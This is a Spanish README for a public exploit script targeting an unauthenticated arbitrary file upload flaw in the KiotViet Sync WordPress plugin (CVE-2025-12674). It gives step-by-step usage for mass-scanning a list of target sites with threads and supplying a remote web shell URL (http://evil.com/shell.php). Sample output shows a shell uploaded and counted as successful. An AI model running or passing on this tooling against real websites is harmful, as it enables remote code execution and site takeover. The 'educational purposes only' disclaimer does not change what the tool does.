
KiotViet Sync <= 1.8.5 - Subida de archivos arbitrarios sin autenticación
KiotViet Sync <= 1.8.5 - Carga Arbitraria de Archivos No Autenticada
El plugin KiotViet Sync para WordPress (versiones hasta 1.8.5 inclusive) es vulnerable a la carga arbitraria de archivos, debido a la falta de validación del tipo de archivo en la función create_media().
Esta vulnerabilidad permite a atacantes no autenticados subir archivos arbitrarios al servidor, lo que puede conducir a la ejecución remota de código.
Clona este repositorio o descarga el script.
Prepara tus objetivos:
Coloca un objetivo por línea en un archivo llamado list.txt.
example.com
site2.com
http://site3.com
Ejecuta el script de explotación:
El nombre del script es:
CVE-2025-12674.py
python3 CVE-2025-12674.py
Cuando se te solicite, introduce tus opciones:
Enter targets file name (default: list.txt): list.txt
Enter number of threads (default: 10):
Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Loaded 1 targets. Threads: 10. │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ http://nxk.ddev.site │
│ Trying KiotViet exploit... │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ ✔ Shell uploaded! ║
║ Check here: ║
║ http://nxk.ddev.site/wp-content/uploads/2026/01/ ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
Summary
Metric Value
───────────────────────────
Total attempts 1
Successful shells 1
Failed attempts 0
shells.txt.Este script se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito es ilegal y poco ético.
El autor no asume ninguna responsabilidad por el mal uso o por cualquier daño causado.
Nxploited (Khaled Alenazi)